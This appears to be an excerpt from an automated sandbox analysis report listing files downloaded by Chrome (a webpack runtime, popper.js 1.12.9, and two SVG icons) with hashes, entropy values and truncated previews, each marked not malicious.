Preview:(()=>{"use strict";var e,v={},g={};function f(e){var r=g[e];if(void 0!==r)return r.exports;var a=g[e]={id:e,loaded:!1,exports:{}};return v[e].call(a.exports,a,a.exports,f),a.loaded=!0,a.exports}f.m=v,e=[],f.O=(r,a,d,n)=>{if(!a){var t=1/0;for(c=0;c<e.length;c++){for(var[a,d,n]=e[c],l=!0,b=0;b<a.length;b++)(!1&n||t>=n)&&Object.keys(f.O).every(u=>f.O[u](a[b]))?a.splice(b--,1):(l=!1,n<t&&(t=n));if(l){e.splice(c--,1);var o=d();void 0!==o&&(r=o)}}return r}n=n||0;for(var c=e.length;c>0&&e[c-1][2]>n;c--)e[c]=e[c-1];e[c]=[a,d,n]},f.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return f.d(r,{a:r}),r},(()=>{var r,e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__;f.t=function(a,d){if(1&d&&(a=this(a)),8&d||"object"==typeof a&&a&&(4&d&&a.__esModule||16&d&&"function"==typeof a.then))return a;var n=Object.create(null);f.r(n);var c={};r=r||[null,e({}),e([]),e(e)];for(var t=2&d&&a;"object"==typeof t&&!~r.indexOf(t);t=e(t))Object.getOwnPropertyNames(t).forEach(l=>c[l]=()=>a[l]);return

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (19015)
Category:downloaded
Size (bytes):19188
Entropy (8bit):5.212814407014048
Encrypted:false
SSDEEP:
MD5:70D3FDA195602FE8B75E0097EED74DDE
SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
Malicious:false
Reputation:unknown
URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:SVG Scalable Vector Graphics image
Category:downloaded
Size (bytes):4642
Entropy (8bit):5.022491680571591
Encrypted:false
SSDEEP:
MD5:02126B1DADD246BC7AA4177E6D132055
SHA1:B5CBEBED5C05C5D341F8901D84EEE3C967A1ECDB
SHA-256:89D0C7BDB3DE275C4161375A0BC9819DFFB40E792B51F9E5516119BF26E20B7A
SHA-512:7E0070C87EC65139C9E6272053B5F6EFFA6C535A0B43C49CBB7C517DAA49AC43D5703D04121124373912A81B2361691BCB4FB9CDF9646F54A93CCBA9F2A80CC0
Malicious:false
Reputation:unknown
URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg
Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>get</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="162297%" y1="64346%" x2="162297%" y2="62763%" id="linearGradient-2">. <stop stop-color="#C30000" offset="0%"></stop>. <stop stop-color="#E10000" offse

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:SVG Scalable Vector Graphics image
Category:downloaded
Size (bytes):4275
Entropy (8bit):5.058379354226963
Encrypted:false
SSDEEP:
MD5:169E2E382A0552834E41C5138D9F510A
SHA1:572362719E6F2785E1EC5A7A7C5E5CAC76C0B1BD
SHA-256:E5C77305B638CFE3EE6FB984ABE8218BBCDDAC8C19CF78D9B917B5F07357A2E3
SHA-512:9AC0EE617DCBE5D468DFDBDC508AE061C1A05E7FD6BAF67A739DB56E712612B71310984C2588B3F5306ECDB9007D83D5A4AA319231E00FDA9ADC6922DEA70C3F
Malicious:false
Reputation:unknown
URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg
Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>send</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="50.0193274%" y1="99.6776273%" x2="50.0193274%" y2="-0.322372663%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-

No static file info